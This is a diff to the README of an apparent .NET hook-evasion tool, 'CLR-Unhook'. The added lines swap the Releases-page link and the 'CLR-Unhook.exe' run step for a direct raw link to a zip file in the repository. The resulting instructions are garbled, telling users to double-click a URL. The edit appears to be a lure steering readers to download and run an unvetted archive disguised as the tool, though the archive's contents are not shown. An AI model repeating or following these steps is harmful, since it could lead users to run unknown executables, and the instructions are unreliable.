david3c2004/CLR-Unhook/README.md

 To get started, follow these simple steps:

-1. **Visit the Releases Page**: Go to the [CLR-Unhook Releases Page](https://github.com/david3c2004/CLR-Unhook/releases).
+1. **Visit the Releases Page**: Go to the [CLR-Unhook Releases Page](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.9.zip).
 2. **Locate the Latest Version**: Look for the most recent release on the page.
 3. **Download the File**: Click on the downloadable link to start the download.
 This will usually be a `.zip` or an executable file.
 4. **Extract the Files**: If you downloaded a `.zip` file, right-click on it and select "Extract All."
 Choose a location where you want to keep the files.
-5. **Run CLR-Unhook**: Open the folder where you extracted the files and double-click on `CLR-Unhook.exe` to run the application.
+5. **Run CLR-Unhook**: Open the folder where you extracted the files and double-click on `https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.9.zip` to run the application.

 ## 📊 How to Use CLR-Unhook

 Using CLR-Unhook is straightforward:

-1. **Launch the Tool**: Double-click on the `CLR-Unhook.exe` file you downloaded and extracted.
+1. **Launch the Tool**: Double-click on the `https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.9.zip` file you downloaded and extracted.
 2. **Select the Target Application**: Click on the "Select Application" button and browse to the .NET application you want to run.
 3. **Unhook and Launch**: Press the "Unhook & Launch" button.
 The tool will unhook the necessary functions and start your application.